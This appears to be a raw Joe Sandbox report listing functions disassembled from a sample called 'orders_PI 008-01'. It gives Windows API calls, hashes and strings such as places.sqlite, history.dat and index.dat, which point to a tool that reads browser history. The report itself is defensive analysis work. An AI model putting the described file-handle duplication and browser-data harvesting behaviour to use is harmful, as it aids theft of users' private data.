                                        • API ID: AddressProc$memcmp
                                        • String ID: $$8
                                        • API String ID: 2808797137-435121686
                                        • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                        • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                        • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                        • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                        Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                          • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                          • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                          • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                          • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                          • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                          • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                          • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                          • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                        • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                          • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                          • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                          • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,75572EE0), ref: 0040E3EC
                                        • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                        • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                          • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                          • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                          • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                        • String ID:
                                        • API String ID: 1979745280-0
                                        • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                        • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                        • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                        • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                        Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                          • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                          • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                          • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                        • memset.MSVCRT ref: 00403A55
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                          • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                          • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                        • String ID: history.dat$places.sqlite
                                        • API String ID: 2641622041-467022611
                                        • Opcode ID: 0d9359b71a36c6a5ae09cc3eb1ef66efc5ef5f63627713107dbdf360f7abf22a
                                        • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                        • Opcode Fuzzy Hash: 0d9359b71a36c6a5ae09cc3eb1ef66efc5ef5f63627713107dbdf360f7abf22a
                                        • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                        Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                          • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                          • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                        • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                        • GetLastError.KERNEL32 ref: 00417627
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ErrorLast$File$PointerRead
                                        • String ID:
                                        • API String ID: 839530781-0
                                        • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                        • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                        • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                        • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                        Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FileFindFirst
                                        • String ID: *.*$index.dat
                                        • API String ID: 1974802433-2863569691
                                        • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                        • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                        • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                        • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                        Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                        • GetLastError.KERNEL32 ref: 004175A2
                                        • GetLastError.KERNEL32 ref: 004175A8
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ErrorLast$FilePointer
                                        • String ID:
                                        • API String ID: 1156039329-0
                                        • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                        • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                        • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                        • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                        Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                        • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                        • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: File$CloseCreateHandleTime
                                        • String ID:
                                        • API String ID: 3397143404-0
                                        • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                        • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                        • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                        • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                        Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                        • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                        • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Temp$DirectoryFileNamePathWindows
                                        • String ID:
                                        • API String ID: 1125800050-0
                                        • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                        • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                        • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                        • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                        Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Sleep.KERNEL32(00000064), ref: 004175D0
                                        • CloseHandle.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CloseHandleSleep
                                        • String ID: }A
                                        • API String ID: 252777609-2138825249
                                        • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                        • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                        • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                        • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                        Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                        Download Yara Rule
                                        APIs
                                        • malloc.MSVCRT ref: 00409A10
                                        • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                        • free.MSVCRT ref: 00409A31
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: freemallocmemcpy
                                        • String ID:
                                        • API String ID: 3056473165-0
                                        • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                        • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                        • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                        • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                        Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: d
                                        • API String ID: 0-2564639436
                                        • Opcode ID: 8b82e4f5ef2bc7d58288eb7d352e73fde76eaac7bad66d9443978647085fe40b
                                        • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                        • Opcode Fuzzy Hash: 8b82e4f5ef2bc7d58288eb7d352e73fde76eaac7bad66d9443978647085fe40b
                                        • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                        Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID: BINARY
                                        • API String ID: 2221118986-907554435
                                        • Opcode ID: bc3d19a7d02c8d15955695c672ee8877c8483ff31dc40855ee5cfcc836beaa69
                                        • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                        • Opcode Fuzzy Hash: bc3d19a7d02c8d15955695c672ee8877c8483ff31dc40855ee5cfcc836beaa69
                                        • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                        Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _wcsicmp
                                        • String ID: /stext
                                        • API String ID: 2081463915-3817206916
                                        • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                        • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                        • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                        • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                        Function 00406B90 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _wcsicmp
                                        • String ID: .Wu
                                        • API String ID: 2081463915-3424199868
                                        • Opcode ID: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                        • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                        • Opcode Fuzzy Hash: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                        • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                        Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                        • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                          • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                          • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                          • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                        • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                          • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                        • String ID:
                                        • API String ID: 2445788494-0
                                        • Opcode ID: f98f4580e944ff1394539a417ce627da6ec9f8ae179723ff754f94650361ffdf
                                        • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                        • Opcode Fuzzy Hash: f98f4580e944ff1394539a417ce627da6ec9f8ae179723ff754f94650361ffdf
                                        • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                        Function 004152C7 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 26COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        • failed to allocate %u bytes of memory, xrefs: 004152F0
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: malloc
                                        • String ID: failed to allocate %u bytes of memory
                                        • API String ID: 2803490479-1168259600
                                        • Opcode ID: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                        • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                        • Opcode Fuzzy Hash: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                        • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                        Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0041BDDF
                                        • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcmpmemset
                                        • String ID:
                                        • API String ID: 1065087418-0
                                        • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                        • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                        • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                        • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                        Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                          • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                        • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                        • CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                          • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                          • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                          • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                          • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                        • String ID:
                                        • API String ID: 1381354015-0
